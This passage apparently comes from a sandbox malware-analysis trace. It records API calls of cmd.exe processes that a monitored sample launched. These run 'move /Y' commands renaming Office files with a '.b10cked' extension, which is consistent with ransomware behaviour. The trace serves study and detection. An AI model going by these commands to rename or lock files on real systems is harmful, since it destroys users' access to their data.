_wcsicmp (_String1="move", _String2="KEYS") returned 2 [0161.704] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0161.705] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.705] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.705] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af2f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af2ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af2ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0161.706] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0161.706] _wcsicmp (_String1="XLINTL~1.TRX", _String2=".") returned 74 [0161.706] _wcsicmp (_String1="XLINTL~1.TRX", _String2="..") returned 74 [0161.706] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl~1.trx")) returned 0x2020 [0161.707] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x91f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.707] SetErrorMode (uMode=0x0) returned 0x0 [0161.707] SetErrorMode (uMode=0x1) returned 0x0 [0161.707] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2aec7c, lpFilePart=0x2aec64 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", lpFilePart=0x2aec64*="XLINTL~1.TRX") returned 0x3c [0161.707] SetErrorMode (uMode=0x0) returned 0x1 [0161.707] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0161.707] _wcsicmp (_String1="XLINTL~1.TRX", _String2=".") returned 74 [0161.707] _wcsicmp (_String1="XLINTL~1.TRX", _String2="..") returned 74 [0161.707] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl~1.trx")) returned 0x2020 [0161.707] SetErrorMode (uMode=0x0) returned 0x0 [0161.707] SetErrorMode (uMode=0x1) returned 0x0 [0161.707] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2af0f8, lpFilePart=0x2aee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", lpFilePart=0x2aee90*="XLINTL~1.TRX") returned 0x3c [0161.707] SetErrorMode (uMode=0x0) returned 0x1 [0161.707] SetErrorMode (uMode=0x0) returned 0x0 [0161.707] SetErrorMode (uMode=0x1) returned 0x0 [0161.707] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2af300, lpFilePart=0x2aee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked", lpFilePart=0x2aee90*="XLINTL32.DLL.trx_dll.b10cked") returned 0x4c [0161.707] SetErrorMode (uMode=0x0) returned 0x1 [0161.708] SetLastError (dwErrCode=0x0) [0161.708] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.dll.trx_dll.b10cked")) returned 0xffffffff [0161.708] GetLastError () returned 0x2 [0161.708] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ae80c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae80c) returned 0x92130 [0161.708] FindNextFileW (in: hFindFile=0x92130, lpFindFileData=0x2ae80c | out: lpFindFileData=0x2ae80c) returned 0 [0161.708] GetLastError () returned 0x12 [0161.708] FindClose (in: hFindFile=0x92130 | out: hFindFile=0x92130) returned 1 [0161.709] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x91cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x91cc0) returned 0x92130 [0161.710] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2aeaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0161.710] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2aeaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0161.710] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.dll.trx_dll")) returned 0x2020 [0161.710] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0161.710] FindClose (in: hFindFile=0x92130 | out: hFindFile=0x92130) returned 1 [0161.710] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2aea58 | out: _Buffer=" 1") returned 9 [0161.710] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.710] GetFileType (hFile=0x7) returned 0x2 [0161.750] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0161.750] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ae9e4 | out: lpMode=0x2ae9e4) returned 1 [0161.750] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.750] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2aea18 | out: lpConsoleScreenBufferInfo=0x2aea18) returned 1 [0161.751] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0161.751] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2aea58 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0161.751] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2aea3c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2aea3c*=0x1a) returned 1 [0161.751] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.751] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0161.752] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.752] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0161.752] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.752] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0161.752] SetConsoleInputExeNameW () returned 0x1 [0161.752] GetConsoleOutputCP () returned 0x1b5 [0161.752] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.752] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.752] exit (_Code=0) Process: id = "275" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0x978" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22218 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22219 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22220 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22221 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 22222 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22223 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22224 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22225 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22226 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 22227 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22267 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22268 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22269 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22270 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 22271 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 22272 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22273 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22274 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22275 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22276 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22277 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22278 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22279 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22280 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22281 start_va = 0x3c0000 end_va = 0x487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 22282 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22283 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22284 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 22285 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 22286 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 22287 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 22288 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 22289 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 22290 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 338 os_tid = 0x208 [0161.734] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fa6c | out: lpSystemTimeAsFileTime=0x14fa6c*(dwLowDateTime=0x99c5b260, dwHighDateTime=0x1d440a9)) [0161.734] GetCurrentProcessId () returned 0x978 [0161.734] GetCurrentThreadId () returned 0x208 [0161.734] GetTickCount () returned 0x31100 [0161.734] QueryPerformanceCounter (in: lpPerformanceCount=0x14fa64 | out: lpPerformanceCount=0x14fa64*=21852312677) returned 1 [0161.735] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0161.735] __set_app_type (_Type=0x1) [0161.735] __p__fmode () returned 0x76b331f4 [0161.735] __p__commode () returned 0x76b331fc [0161.735] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0161.735] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0161.735] GetCurrentThreadId () returned 0x208 [0161.735] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x208) returned 0x38 [0161.735] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0161.735] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0161.735] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.735] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0161.735] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f9fc | out: phkResult=0x14f9fc*=0x0) returned 0x2 [0161.735] VirtualQuery (in: lpAddress=0x14fa33, lpBuffer=0x14f9cc, dwLength=0x1c | out: lpBuffer=0x14f9cc*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.736] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f9cc, dwLength=0x1c | out: lpBuffer=0x14f9cc*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0161.736] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f9cc, dwLength=0x1c | out: lpBuffer=0x14f9cc*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0161.736] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f9cc, dwLength=0x1c | out: lpBuffer=0x14f9cc*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.736] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f9cc, dwLength=0x1c | out: lpBuffer=0x14f9cc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0161.736] GetConsoleOutputCP () returned 0x1b5 [0161.736] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.736] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0161.736] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.736] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0161.736] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.736] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0161.736] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.736] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0161.736] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.736] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0161.737] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.737] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0161.737] GetEnvironmentStringsW () returned 0x2d0210* [0161.737] FreeEnvironmentStringsW (penv=0x2d0210) returned 1 [0161.737] GetEnvironmentStringsW () returned 0x2d0210* [0161.737] FreeEnvironmentStringsW (penv=0x2d0210) returned 1 [0161.737] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e96c | out: phkResult=0x14e96c*=0x40) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0xa0, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x1, lpcbData=0x14e970*=0x4) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0x1, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x0, lpcbData=0x14e970*=0x4) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x40, lpcbData=0x14e970*=0x4) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x40, lpcbData=0x14e970*=0x4) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0x40, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.737] RegCloseKey (hKey=0x40) returned 0x0 [0161.737] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e96c | out: phkResult=0x14e96c*=0x40) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0x40, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x1, lpcbData=0x14e970*=0x4) returned 0x0 [0161.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0x1, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x0, lpcbData=0x14e970*=0x4) returned 0x0 [0161.738] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x9, lpcbData=0x14e970*=0x4) returned 0x0 [0161.738] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x9, lpcbData=0x14e970*=0x4) returned 0x0 [0161.738] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0x9, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.738] RegCloseKey (hKey=0x40) returned 0x0 [0161.738] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886383 [0161.738] srand (_Seed=0x5b886383) [0161.738] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 